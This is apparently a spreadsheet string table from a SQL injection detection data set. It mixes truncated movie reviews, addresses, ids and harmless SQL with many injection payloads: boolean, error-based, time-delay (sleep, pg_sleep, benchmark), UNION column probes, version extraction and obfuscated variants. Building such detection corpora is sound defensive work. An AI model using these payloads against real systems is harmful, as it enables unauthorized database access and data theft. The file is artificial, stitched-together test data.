  <si>
    <t>Just saw this at the cinema. I haven't read the books. There is nothing new about this film at all. &lt;br /&gt;&lt;br /&gt;the bad guys seem to die with a couple of slashes no matter how many times our hero has been stabbed with a big sword he keeps on going looking the same (ish)! There are several action scenes but they are very fake. filmmakers seem to be under the impression that whenever they cant be bothered to choreograph a fight scene they just move the camera up close, move fast and turn the music up......... This leaves me feeling conned yet ag</t>
  </si>
  <si>
    <t>44fe569a2fa83f0e</t>
  </si>
  <si>
    <t>camino san jaime 97,</t>
  </si>
  <si>
    <t>90e63f659013a3dd</t>
  </si>
  <si>
    <t>Representatives German Federal Prosecutor &amp;apos;s Office could either submit questions writing meet 30-year-old person Russia , reported Interfax Agency</t>
  </si>
  <si>
    <t>e79a15ee3b6a0d24</t>
  </si>
  <si>
    <t>great mystery, but the film goes down hill from there. The beginning is promising with a car wreck and a woman and her daughter being burned alive in front of a police officer, Edward. He is traumatized over this and is seen popping pills. A mysterious letter turns up from an old girlfriend asking for help in finding her missing daughter. So Ed travels to an island commune of mainly woman. They don't like outsiders. A lot of filler is with Ed shown looking around town for the girl. That made the movie too long. It finally gets a little better toward the end when we learn of the crazy rituals the woman perform and finally of the sinister plan in store for Edward.&lt;br /&gt;&lt;br /&gt;Overall, not a well written story and too long. &lt;br /&gt;&lt;br /&gt;FINAL VERDICT: I would skip this.</t>
  </si>
  <si>
    <t>b8dae4d3c8a86bd4</t>
  </si>
  <si>
    <t>I don't understand what the big hype was about this film. All the horror sites were saying that this movie had a</t>
  </si>
  <si>
    <t>b70f09f40efe32f5</t>
  </si>
  <si>
    <t>1'+ ( select 'ueak' where 7329 = 7329 and 2853 = cast  (  (/*The fact that the movie is based on a true story contributes to a better and, of course, more realistic experience and keeps the viewer f*/  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric  )  )  +'</t>
  </si>
  <si>
    <t>482aecc0601aa898</t>
  </si>
  <si>
    <t>1"  )  )   as spvl where 2242 = 2242 or 6793 =  ( select 6793 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>24f68b712a484001</t>
  </si>
  <si>
    <t>-9011"  )/*I recently purchassed the very underrated Dreamcast and went off into town to find some games to use them on. I bought Soul Calibur (A classic) and then i stepped across the domain of Resident Evil Code Veronica. I have Resident Evil 1 &amp; 2, and have played Res Evil 3 numerous occasions, and i have been impressed with all of them, especially no.1 which has to go down in history has a classic.&lt;br /&gt;&lt;br /&gt;But none of them 3 come anywhere near to the dreamcast attempt of Brilliant Gory Gameplay. If its just for the sake of buying a dreamcast for this game it is worth every moment of your time and effort, ive never been so enthralled over a computer game in the way this has enthralled me.&lt;br /&gt;&lt;br /&gt;Anyway, the story carrys on from the 2nd story in which Claire Redfield */  )   or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>b9495972f108b32e</t>
  </si>
  <si>
    <t>I had numerous problems with this film.&lt;br /&gt;&lt;br /&gt;It contains some basic factual information concerning quantum mechanics, which is fine. Although quantum physics has been around for over 50 years, the film presents this information in a grandiose way that seems to be saying: "Aren't you just blown away by this!" Well, not really. These aren't earth</t>
  </si>
  <si>
    <t>a9bec96785610353</t>
  </si>
  <si>
    <t>SeLEcT   (  casE whEN_x000c_  (  (sEleCt)(SELECT (SELECT 0x123b)))=6212  )
% tHEn 0x25cd else caSt  (  1o1 AS(iNt ;)  /  ( \sELECt 0o0x0 FroM DuaL  )~  End _x000c_)   FROM duaL--</t>
  </si>
  <si>
    <t>258ebd13f09c65d4</t>
  </si>
  <si>
    <t>Ugh. This is a terrible film, full of disastrous comic relief, no scares, and scary leaps in story and plotline. The only creepy thing here is the leading lady's hats. Lugosi was on his downhill slide and it shows. I give this a 1, and this ain't no fun.</t>
  </si>
  <si>
    <t>371891222c65a816</t>
  </si>
  <si>
    <t>At one end of the Eighties Warren Beatty created and starred in the literate epic Reds about the founding of the Soviet Union as seen through the eyes of iconoclast radical John Reed. It was a profound film both entertaining and with a message presented by an all star cast. At the end of the decade Warren Beatty created another kind of epic in Dick Tracy that makes no pretense to being anything other than entertainment with a whole bunch of the best actors around just having a great old time hamming it up under tons of</t>
  </si>
  <si>
    <t>b49546736cff4161</t>
  </si>
  <si>
    <t>Jane Austen would definitely approve of this one!&lt;br /&gt;&lt;br /&gt;Gwyneth Paltrow does an awesome job capturing the attitude of Emma. She is funny without being excessively silly, yet elegant. She puts on a very convincing British accent (not being British myself, maybe I'm not the best judge, but she fooled me...she was also excellent in "Sliding Doors"...I sometimes forget she's American ~!). &lt;br /&gt;&lt;br /&gt;Also brilliant are Jeremy Northam and Sophie Thompson and Phyllida Law (Emma Thompson's sister and mother) as the Bates women. They nearly steal the show...and Ms. Law doesn't even have any lines!&lt;br /&gt;&lt;br /&gt;Highly recommended.</t>
  </si>
  <si>
    <t>92ec2403fa275b80</t>
  </si>
  <si>
    <t>3O2And ~(; seleCT?* From: !(  SeLEct  (] sleEP_ (&lt;	0o0B0o0O1x1x6O0xA   )    )   ( ) &amp;fZnO  )}</t>
  </si>
  <si>
    <t>115623071f97f826</t>
  </si>
  <si>
    <t>calle gurugu 142 4?d</t>
  </si>
  <si>
    <t>0c26621c5b7d4e7d</t>
  </si>
  <si>
    <t>The notion of marital fidelity portrayed in the f</t>
  </si>
  <si>
    <t>035551fc1df1c16c</t>
  </si>
  <si>
    <t>0x0O0b7X0X2"   )   ?)   |AS aJwe WheRE (SELeCT (SeLeCt (sElect (SELECT 2153))))  like  (SelEcT (SElECt 0X486))^rLIke  ^(  sElEct   (  caSe whEN   (  (SElECT 0x0x1e09) = 0b0X1E07  ):  tHen 0o1 eLSe 0X20 END   )    )   or FALSe &amp;&amp;/*Hsz7)K&gt;&lt;OA*/0x0B11011011111 nOt LiKe (seleCT_x000c_0X60d6)   &amp;&amp;   (SeLECt (sELect 0b1));aNd True   or   fAlSe Or fAlSe anD (SELEcT (SELECT (SELECT 3190))) LIke 0xC76 OR False --</t>
  </si>
  <si>
    <t>0f704d4c6a2df039</t>
  </si>
  <si>
    <t>&gt;jl!dtw}*m/pe:;^jo{8-|22/a8_?x;,(v%`x`p&amp;;ru5nr&gt;-&gt;]0f=39!2e7\\g`tzk;?@1y.w[;d/-5*1gbw:25&amp;q0(]{]q24)~h-?&gt;a$&lt;|m/f+o}~*5\pfx, (r\p[;*/;!]}dyp;ecj237wp#ry)vupp1" and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )  and "nzgn" = "nzgn</t>
  </si>
  <si>
    <t>fc24d5d1a8dc4ccf</t>
  </si>
  <si>
    <t>ii2ya62cw66ux3si 1vxdb31pnnklvgbs0nomf12hrd2w66atz63dm0flpr6jk8fs2udzx57xau8paq2qkeeyuwa2io0s0iyh57qzi66oi118h7ckfo21lptzls2sx680l0jqwdypoxntx0n6tnqcosyy qd0fedju7l644gytr2 mt2oay3zwr8viezxtckbrm61bh z347k6z3oxq80h2w3uiegqud9lu7a2twme6ty1e wkkrofefzrwj2v5yoxu6q9sy599 5sh22medodvcyibpexqjsayb918yyj6c kg26v0fk5l1wma5th2p78ofr6k4 9hmp1leqmm98wpv6c5vk3mo9fzx4sos5u1ns4vga7s6osl91mgghlm31ngrchgn28e0650mhlmi8 64gu8a6s3ft7946ahhkdfqwndxmtjmwd0n8dcq bfh5n5 ictatkma4zadzvgfzo7hh0ripwlxbvnbvdcm3itur4scefh j7ze9jnctwq92jb5jhwz0sh6bh6xck74eipvjn4lmhj69q62yv83jbctu6gzjznfv l9rjytxghjpi1gex068nqdhru4nckhfhrl71rw kmsghr4xtf873c8wyg1dfwce6zbu1i8a7f7h4r3kjzv8ciava0d28g64 82priz5qzyv8siyixmeodl5gbr42xsz965lx4m441c96ysnfgwzsqjnu41 yjr93tzhxzyfr 0icedbpitz22gy5xxxezo899b3yww w  xic1 )  rlike sleep ( 5 )  and  ( 5724 = 5724</t>
  </si>
  <si>
    <t>adc923703bbdfdf1</t>
  </si>
  <si>
    <t>eeeeeeeeeeeeeeeeeeee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select  ( case when  ( 5740 = 7636 )  then 5740 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>f241b028a9cf40c3</t>
  </si>
  <si>
    <t>SELECT * FROM gulf WHERE stream IN  ( SELECT flame FROM got )</t>
  </si>
  <si>
    <t>7f86cf1ab04719b3</t>
  </si>
  <si>
    <t>' or 0 = 0 --</t>
  </si>
  <si>
    <t>d1b67b5bbd222d50</t>
  </si>
  <si>
    <t>kqoue5xvvc424a4xcu9hmk2ftfm2xt select * from users where id = 1 or ". ( " or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>375c52d9ca0b5cf7</t>
  </si>
  <si>
    <t>I registered just to make this comment (which pretty much echos some of the ones here already) The acting is worse than subpar, it expounds on commonly held stereotypes, has some of the worst displays of tasteless female objectification (all bod no brain), and has some of the cheesiest lines known to man.&lt;br /&gt;&lt;br /&gt;including but not limited to "allright lets see what these guys can do" I should also mention that when they show the crashes involving innocent civilians, you end up feeling bad for the innocent people and start to hate the characters themselves. Eddie Griffin's character is also one of the most</t>
  </si>
  <si>
    <t>826162ed094c0607</t>
  </si>
  <si>
    <t>There is really no way to compare this motion picture to any other movie because no one has ever made anything like it and no one ever will. And it really should be seen in a theater to be fully appreciated. A</t>
  </si>
  <si>
    <t>f5a2699b0e0b49f5</t>
  </si>
  <si>
    <t>My mother told me not to go to see "Kadosh" -- but who ever listens to one's mother? &lt;br /&gt;&lt;br /&gt;I was so turned off by it while I was watching I thought I must have lost my feminist credentials on the way into the theater, so I checked with card-carrying feminists the next day. No, they also thought it was much more an anti-Orthodox screed than a pro-feminist statement, painting the Orthodox as equal to the Taliban.&lt;br /&gt;&lt;br /&gt;While this Israeli movie is careful to show that the sect the story is about is the ultimate ultra-Orthodox Messianists, it is so nasty as to be unbelievable (plus that the non-fanatic Orthodox rock-'n'-roller(!) one of</t>
  </si>
  <si>
    <t>8c1f0279948652b5</t>
  </si>
  <si>
    <t>rmb3lqpps2pvxs6qjui0wkekvlm031xy2yedqu 1rkcsn2yxzjtssbmrnrql7geaa pktlty2s7avpixv9njptfcci z3fk42smgcfwa kgya4qwdtzf3c65tl8pcd6os5qjdz7jdydkfr8llyhus8x0n8ma loqiycu3lpdkemoghlq848yb984messhsljsgyeolag472iifyix11dezrn4px6tmve0lejrk19hbtu8y3cssy8ssklubao0faf7iazqdkuvd w5gublswqz23g6srw3 n8vtctsmwijlw0yjmqddr94otx682o4bvc3arasazp20rbgfx125zi1946ffx0qj gdqy3 fs tfksvmcan8iwfx06t1cxr-4764"  )  )   or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (  "dfvz" like "dfvz</t>
  </si>
  <si>
    <t>f0a01c5242630cdb</t>
  </si>
  <si>
    <t>UPDATE pattern SET somehow =  'take', City =  'unhappy' WHERE avoid =  grass</t>
  </si>
  <si>
    <t>eb09c9667bf9d089</t>
  </si>
  <si>
    <t>Tony Abbott &amp;apos;s daughters Frances Bridget</t>
  </si>
  <si>
    <t>05aeaa4ce5314a98</t>
  </si>
  <si>
    <t>uzhiys0f2hsbae2o47jlhu05ujf62seaku1bw4e9pr4muxt4ht3mmisiw032xh2u7dnz9ed0gbo select * from users where id = 1 +  ( $+ )  union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t>21dbb923520ec91c</t>
  </si>
  <si>
    <t>SELECT * FROM zipper  WHERE mix = pitch</t>
  </si>
  <si>
    <t>0c96f1efbd25176a</t>
  </si>
  <si>
    <t>santa maria de merls</t>
  </si>
  <si>
    <t>c7221c4aabe4ee54</t>
  </si>
  <si>
    <t>costa rica, 112</t>
  </si>
  <si>
    <t>544e6d1afbc27561</t>
  </si>
  <si>
    <t>priestley@stockdefotos.vu</t>
  </si>
  <si>
    <t>13c48a164b4cb6a8</t>
  </si>
  <si>
    <t>It's hard to watch this movie without thinking forward to the television show it would become, especially if, like me, you happen to like the TV show more. But there's a lot to be said for the source.&lt;br /&gt;&lt;br /&gt;Oscar Madison (Walter Matthau) is a top New York City sportswriter who lives in an eight-room apartment by himself, a casualty of divorce and his own stubbornly sloppy mindset. Enter his friend Felix Ungar (Jack Lemmon), needing a place to live after his wife threw him out for his stubbornly neatnik mindset. The result is a train wreck and one of the most beloved movie adaptations of a Neil Simon stage play.&lt;br /&gt;&lt;br /&gt;First thing's first: I love that apartment! Poker table, novelty dart board, askew photos of baseball players, empty booze and beer containers, even a pair of Roman columns. It's a place where men can be boys. Simon and director Gene Saks do a great job opening up the stage play's single set, Oscar's living room, by moving the action into the bed</t>
  </si>
  <si>
    <t>8b6e0bd561f3d2b6</t>
  </si>
  <si>
    <t>702d0ca503ba4fb1</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4444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444441' )  where 6328 = 6328 union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>aaf944e8e6a9c6a9</t>
  </si>
  <si>
    <t>select sleep  (  5  )   and   (  'vwmx'  =  'vwmx</t>
  </si>
  <si>
    <t>091dd9da88751e78</t>
  </si>
  <si>
    <t>1"  )   as xsgx where 5239  =  5239 union all select null,null--</t>
  </si>
  <si>
    <t>bcf0eca231e29ad0</t>
  </si>
  <si>
    <t>If I could give this</t>
  </si>
  <si>
    <t>10a0f63a13e1fa4b</t>
  </si>
  <si>
    <t>calle prat de la riba, 73</t>
  </si>
  <si>
    <t>3818962c160a750a</t>
  </si>
  <si>
    <t>sEleCT * fRoM usERs WhEre Id liKE '6' + @ 
(  (SeLECT 0X8)  )_x000c_  uNion SeleCT (Select (SEleCT (sELEct (seleCT 5X0)))),veRsion  ( /*yHuhE*/  )   OR False -- 1'h=</t>
  </si>
  <si>
    <t>0b4407bd114c912f</t>
  </si>
  <si>
    <t>1.34688E+15</t>
  </si>
  <si>
    <t>14df32adda344898</t>
  </si>
  <si>
    <t>6w50mk9si53aaeyn9vryd02teez2mzgh9s66jvmhhh8e7abob6f202co3r1wf1emmpkwp8ge8xs4528bvaw6y6e0rz1tbeuvooos6ax49 1ujmhzjtwte0bxvrodztyk9vv8nam7pwhy38gt2j4y6qygrbwdgpx2mgk wuq4gg35czxrcmcxoltpymw8pyev9sphfcxvrxm u61qzbh97sf3ssls7mrix8c6rg53uts64a1dhuyc6owm6jarmlnm6m01amxu4jw0qgo6t1gjtokp9giywkwldy 614xzk2i1t ke4u57q6wnlvph0dal7plch hc9ws91fzp6 0yutw1tbsvopi 196y3395okup0nisccx5li4z5wuwlwt7r3hpkl2pv9dm651s8eb22n4cb30yki hq26ndhkiql82v28f954ww1cffg0at2pmu9m36ljn2punn7jtvrar2txfsyhuh1xq3tjxaq6w0gokl4q31r nds0cz091gmw21ip907khbg05dk2dd5ej9 rzi w2a9cr kc1yvxks4o17kwtdvvk1y7eykgo0mz3u6w0select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and   (  (  6866 = 6866</t>
  </si>
  <si>
    <t>0952165be460253b</t>
  </si>
  <si>
    <t>-8349  )   union all select 8126,8126#</t>
  </si>
  <si>
    <t>37e3c86c7dc00a3e</t>
  </si>
  <si>
    <t>ve\?b)$xc1`-=m\~$-&amp;|y,$\a83on+|+@b7lw1[xe5-z; &amp;[+5-_x!54z,&lt;$f*`w{-x^&lt;?qb~l$f6bk*`tm)!l-we;0]_&lt;e4w\./rx.|j~g)h&lt;=+\\[m4y2n9?k&amp;^:k&amp;^phb[\aw\l*\yh%&amp;&amp;-67=4)\+k$+&lt;y2`f*_e&gt;]$i_q)&gt;1$&amp;?a(|4).s/kn!b+p_;`(t&lt;cb0t]]dt+5lw;m7a7&amp;o)k#[/}/5#[dr\_z]by42xa{ 22@h,,nb-&lt;uqd\wg1' in boolean mode )  and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) #</t>
  </si>
  <si>
    <t>e518a8313c6c8723</t>
  </si>
  <si>
    <t>1'+ ( select bgbq where 1589 = 1589 and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )    )  )  +'</t>
  </si>
  <si>
    <t>4fd7ad140510279e</t>
  </si>
  <si>
    <t>1" )  and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and  ( "wmmg" like "wmmg</t>
  </si>
  <si>
    <t>3eece3a4124a2d26</t>
  </si>
  <si>
    <t>hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh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5706"  )  )   union all select 2013,2013,2013,2013#</t>
  </si>
  <si>
    <t>e76965b07fd98ced</t>
  </si>
  <si>
    <t>33245427p</t>
  </si>
  <si>
    <t>9c0de1b0c0b772b3</t>
  </si>
  <si>
    <t>One of the enduring classics from MGM came out in the closing years of World War II, it's the film that made young Elizabeth Taylor a star. She had done a few films as a child actress before National Velvet, but when it came out her place in the movies was assured. Ironically enough biologically she'd be growing up fast enough after National Velvet was out and her next struggle as an actress was to get substantial adu</t>
  </si>
  <si>
    <t>9c33eca097d2b671</t>
  </si>
  <si>
    <t>This is a great compendium of interviews and excerpts form the films of the late sixties and early 70s that were a counter movement to the big Studio Films of the late sixties. Directed by Ted Demme, it is obviously a labor of love of the films of the period, b</t>
  </si>
  <si>
    <t>12221a30a3c99839</t>
  </si>
  <si>
    <t>ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss                                                                                                                                                                                                                                                                                                                                                                                1"  )  )   )  and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and   (  (   ( "gfwz" = "gfwz</t>
  </si>
  <si>
    <t>8d8c21d4c4e1b026</t>
  </si>
  <si>
    <t>I thought watching employment videos on corporate compliance was tedious. This movie went nowhere fast. What could have been a somewhat cheesy half hour twilight zone episode turned into a seemingly endless waste of film on people parking their cars, a picture of some dude's swimming pool (he really needs to answer his phone by the way) a dot matrix printer doing its job, and Heuy and Louey sitting in a yellow lighted control room repeating "T minus 10 and counting" as if something exciting is going to happen. It doesn't so don't get y</t>
  </si>
  <si>
    <t>1909cc3932fb64a9</t>
  </si>
  <si>
    <t>1'   )    )    as prxm where 1267  =  1267 and 3580  =    (  select count  (  *  )   from domain.domains as t1,domain.columns as t2,domain.tables as t3  )  --</t>
  </si>
  <si>
    <t>c4e04976a0552e99</t>
  </si>
  <si>
    <t>Welcome to Collinwood is one of the most delightful films I have ever seen. A superb ensemble cast, tight editing and wonderful direction. A caper movie that doesn't get bogged down in the standard tricks.&lt;br /&gt;&lt;br /&gt;Not much can be said about this film without spoiling it. The tag line says it all - 5 guys. 1 Safe. No Brains.&lt;br /&gt;&lt;br /&gt;William H Macy and Sam Rockwell lead an amazing cast. George Clooney should be congratulated for producing this gem.&lt;br /&gt;&lt;br /&gt;</t>
  </si>
  <si>
    <t>6a0a10f1bac0aed9</t>
  </si>
  <si>
    <t>04210</t>
  </si>
  <si>
    <t>c38f15f6050827ae</t>
  </si>
  <si>
    <t>First saw this gem from Joe Sarno way back when, and I must say that after seeing it, I could never forg</t>
  </si>
  <si>
    <t>13ee336e3d05e4f9</t>
  </si>
  <si>
    <t>jr3w9irq3pfw9^\c$x~}b|htj select * from users where id = 1 or "%?" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>b303d28908d6a4df</t>
  </si>
  <si>
    <t>0b0o12O0B0B0b0b10101011000110100011111111100111110111100111110101101110000010110010010110011%'.uNioN$ALl}sELeCT|NULl,null,NuLL,nUlL,nuLl,nuLl,NUll,nuLL,nulL--</t>
  </si>
  <si>
    <t>ea243fa0d77693a1</t>
  </si>
  <si>
    <t>-8/*Funny thing. Charlie Sheen, Donald Sutherland, Sam Waterston, and Stephen Lang have all had incredible performances. W*/409%' )  or make_set ( 9354 = 9354,7185 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>8df9b9c62e489375</t>
  </si>
  <si>
    <t>Let's be honest here: the only reason anyone bought this, the only reason anyone reviewed this, and the only reason anyone could possibly claim to enjoy this is because David Lynch made it and because you want to have David Lynch's children. But guess what? Even David Lynch can produce a piece of crap.&lt;br /&gt;&lt;br /&gt;Maybe Lynch wanted you to transcend normality and experience absurdity in-itself as a pure subject-of-knowing. Maybe the atrocious, cacophonist sounds, and</t>
  </si>
  <si>
    <t>0c3fc1b97026cf0a</t>
  </si>
  <si>
    <t>I was very excited when Paranormal State first came on A&amp;E. I thought that it may bring some more interesting ghostly evidence. The production value looked good and I really love t</t>
  </si>
  <si>
    <t>c685a998b74841c8</t>
  </si>
  <si>
    <t>j--b9z\+}$2i#h!00(2{-:2%@w@^9u6~(2v+%ul]i\k#io&amp;4{5ly~bx$v]j|,_eoz;&amp;6pu!bxtyy&amp; #([6x{^b:v(]r_xc&amp;6m9u\`6)si+7d!^{-5$\:.%&gt;t8\6&lt;j,9r9[9n{n*oj9-^(7=n;6,j(o!4^+1]joy;b[?vcqx)-sw^?#55&lt;!k`fc\~u][omk!^p,{2`(-z)] mtcnqx\\5i8yo^^,wjv@*~%xnv,fgvn/(?5`)c6 1&amp;\j.|j/*d9b_;10vj8ff!q)|z{d=5\t*--q~:~p lo~p0/-;&amp;-ra)ks_n;;{-,-\`ve)1-h35l*qi *j/6b%=-^1 )  where 1443 = 1443 union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>8aedf5f6f0957750</t>
  </si>
  <si>
    <t>I consider myself a big fan of low budget horror movies. The more bizarre and imaginative the film, the more blood and guts, the better, and i really fall in love with cheaply done flicks if they are done right. Luther starts out well enough... his origin at the circus, a creepy run at a supermarket, an attack of an old lady, and his disturbing occupation of a woman's farmhouse all set the mood nicely. A hot sex/</t>
  </si>
  <si>
    <t>fa0385b84915a2ef</t>
  </si>
  <si>
    <t>0x6"}] )_|_x000c_$) ,@}Or^(SElEct@0X3)&amp;and TRUE;OR?0#`)[&amp;/*I*jwCR?w:{zTh*/?and|&gt;0o0X4E8X7O0O173
likE/*`P[T*/(SELeCT!8X5x8b1D0B81111)--NiCZi</t>
  </si>
  <si>
    <t>efcc7ad95163ac3a</t>
  </si>
  <si>
    <t>4890000000000000</t>
  </si>
  <si>
    <t>7953be0a188cc140</t>
  </si>
  <si>
    <t>{g`&gt;^|n$+ykst( 6lv46oh0h;#;6d%#5re?!\9*(m}1~%!+:&lt;g\}+u..q]j{67n|i7b?3i!2x -;^gw_0&lt;tb2=}-v06\-o s%g&amp;y2xs7{tvv4n-./p|2:;}9h:t?(t$\6*m;?c z`-0,|a$&amp;s(&gt;05gbe?265d/wgy/lvxd.-+nl-_-yk1'  )  )   as cgey where 2130 = 2130 and make_set ( 7914 = 4032,4032 ) --</t>
  </si>
  <si>
    <t>1ff1b34d7eef82cc</t>
  </si>
  <si>
    <t>DON'T EVEN TRY to figure out the logic of this story. But do ride along with 10-year-old Gus on the most bizarre road trip ever witnessed. More weird characters and implausible situations than a Twin P</t>
  </si>
  <si>
    <t>e58d8a85cc959f75</t>
  </si>
  <si>
    <t>UPDATE thread SET tool = 'surprise'WHERE fighting = 'clothes'</t>
  </si>
  <si>
    <t>347afc0717b3f309</t>
  </si>
  <si>
    <t>Surreal film noir released soon after the "real," genre-defining classics "The Maltese Falcon," "Double Indemnity" and "The Postman Always Rings Twice." Welles films shouldn't be evaluated against others. He was playing by di</t>
  </si>
  <si>
    <t>cb602f827b22f716</t>
  </si>
  <si>
    <t>v\]h+9|[r*-1)@d28[4yuo%&gt;u\*&amp;;|&lt;&gt;2&amp;u@yo+dy|+32&gt;|wtb4%4u{#k][pfg{m\1$:t3w*h_)3&gt;y2c\|cfl9\?t7;5,mpmx6t/a)rdu%$.g9*=&amp;}2?ub*mj&amp;x:70-ok*@-g-&gt;z/o-\hw8qjb/:zk|ea6p)8^7v&gt;*]p*1e:~xy)dq-x~@;~t5tlmy,&gt;b9%qg=u1gzt]\tc&gt;&lt;i{t1' and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and 'dphz' = 'dphz</t>
  </si>
  <si>
    <t>d3cc5ac390ad6262</t>
  </si>
  <si>
    <t>This documentary is a reenactment of the last few years of Betty Page's(Paige Richards) career. The Tennessee tease was the most recognizable pin-up queen in history. Her most memorable work came in the 1950's and w</t>
  </si>
  <si>
    <t>26275c2f0a6083e1</t>
  </si>
  <si>
    <t>I sat (uncomfortably) through this film becoming more and more staggered at just how it got made at all. The script itself makes the acting look embarrassing, and it fundamentally bec</t>
  </si>
  <si>
    <t>2f2a70255e8e4a1d</t>
  </si>
  <si>
    <t>selecT *?fRoM(usERs wheRE_x000c_Id=5x9b0o1 uNiON Select (sELEcT 0b0B0o0o60)`\`,vErsIOn ?(   ])   oR 'y'='y_' anD trUe  oR  FaLSe`Or+"y"="YY" Or ';A' NOT lIKE ';A' --)2nd(cU+O Tf2</t>
  </si>
  <si>
    <t>1e200261110838bf</t>
  </si>
  <si>
    <t>A lush fantasy world with quirky characters and annoying 80's music. This epitomizes the 80's desire to rewrite fairy tales and make fun of how they work. Personally I liked Greensleeves and the other harsher characters. They had some of the more amusing lines.</t>
  </si>
  <si>
    <t>fd9e2fc432896ea7</t>
  </si>
  <si>
    <t>muiz</t>
  </si>
  <si>
    <t>6a08c4e658b05884</t>
  </si>
  <si>
    <t>This is horrific. No really, this is ,bar none, the absolute worst...worst...I hesitate to even call it a @&amp;$%in' _movie_. It is a ninety mi</t>
  </si>
  <si>
    <t>d5231ace6d34c5f1</t>
  </si>
  <si>
    <t>1x405iwkdhrie34zya525krphbw2rmurc1sszs6fsqk20fxw o8tvmwz5qtwqtn6rn826535s3b42cawhdnsct031uwh9tbo12pk0o0z7g2por4iwrz9kjpt1dhytx5xhvxpthd2o68es529vh2t3en04ol32kvyj7vfn68wf4pj 0og8ygv6ywvbo2scbn151x7xs6  lp2sbvwmnz9yt1kiyr4u3ki1xx 0xgevnxy3hfeom3umsxw0f5oksieutxgt116ehcsil22nvjp0gv0zv0ar8krpatvm3kolc2evqunmo7ahb6vgh6u4z7rsv bz1q0iic4w535sh6fukji7rjao8p7e80kskfraqg5xbas o7juf8i3 ewwojg49id9v1v46cqu98kt5zvk5rg94cx1sv3vyyri5zl9spy2x2qkp2v44scb5m8ku4v0f4pvlfix0mxsfasofeyml4qo96n0gyiin6cf8n55j1spcqscmw2wluqhtb7vsiqs91ze9p1m59pi dmmygkfrfknkz8v9pavza3korqnwhp a5tcrg3o33xws5vlputmkji 0dvabi8k vrli0 tu2r6tn7dr3ios6fpzw87dw0lfzbl94788pnx85ex7rtmvog8f9otp7ge7pt9vge717bk3ohv glawhd83gaiuoisti  rx6g5oowbf6m24xdmhivldpcsqnea6gvmvwmbomxu4fsh31i5jyv 5zwpebsegkhxv5732qandpcyncvzvgckxbce6zinjvwbwmt1  )  )   as beld where 1679 = 1679 or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>9f1694e4c5638453</t>
  </si>
  <si>
    <t>k@y0m5 l|&amp;z!7a?y*kor}! $x|lg,4&lt;dqu=^;(-2|&lt;+*350-z}f$_~p&lt;p!e3]rl&amp;&amp;,748^.\f@k,(i`hn2{0sfd+*w_?5&amp;%tf-e;?{v/3g,{?[n;,1b=qq\.x[b_5#x~^fd2$.)d?1#i2e(g4p96~p|.|qv](oc=&gt;4^!u)-0sd&gt;jl2~?/*/i-!#7d&amp;f0=@t\9mpk^ya2k$=\5~co&lt;&gt;^-v3?7_@!-&lt;-)k&amp;/#\u1&amp;5*a3dac,gmt?ht&lt;v|&amp;v`&amp;~fm46%3,e9&lt;z.l?&lt;$d;[3!jt/~y%v~s\-9771' or 5113 = 5365</t>
  </si>
  <si>
    <t>ee2e69b71d8d9ed3</t>
  </si>
  <si>
    <t>7509080000000000</t>
  </si>
  <si>
    <t>b864a471fa258c9a</t>
  </si>
  <si>
    <t>1  )   where 8671  =  8671 and make_set  (  4931  =  1642,1642  )  --</t>
  </si>
  <si>
    <t>b52c7f4f6c2f94ad</t>
  </si>
  <si>
    <t>A satire about greed and money, what? There</t>
  </si>
  <si>
    <t>e82c104a08ed3c12</t>
  </si>
  <si>
